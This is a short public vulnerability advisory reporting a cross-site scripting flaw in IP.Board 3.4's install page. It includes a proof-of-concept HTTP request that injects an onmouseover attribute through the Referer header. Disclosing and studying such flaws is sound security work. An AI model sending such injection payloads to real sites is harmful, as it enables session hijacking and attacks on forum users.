±-------------------------------------------------------------------
+

• IP.Board 3.4 cross-site scripting in Referer header

±-------------------------------------------------------------------

• vendor site…: http://www.invisionpower.com
• Affected Software .: IP.Board 3.4
• Class …: XSS
• Risk …: high
• Found by …: Ahmed atif abdou [ OCERT Ambassador Program - Oman National CERT ]
• Facebook .: https://www.facebook.com/runvirus
• Contact …: stormhacker[at]hotmail[.]com
  ±-------------------------------------------------------------------

[X] Affected Products:

test on IP.Board 3.4.6 & IP.Board 3.4.4

maybe work under 3.4

[X] About the application:

IP.Board is the leading solution for creating an engaging discussion forum on the web.

[X] Vulnerability Description:

The attack is going with above-mentioned conditions. It's needed to send

POST request to http://path_forum/admin/install/index.php

with setting of Referer header.

Referer: 1" onmouseover=prompt(947671) bad="

[X] Exploit :

GET /admin/install/index.php HTTP/1.1
Referer: 1" onmouseover=prompt(11111111) bad="
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie:
Host: localhost/admin/install/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: /

[X] Video proof :

https://www.youtube.com/watch?v=WYm4C611eyU&feature=youtu.be

±-------------------------------------------------------------------
+

• Greets:
• || rUnViRuS || - || Providor ||
  ±------------------------[ W D T ]----------------------------------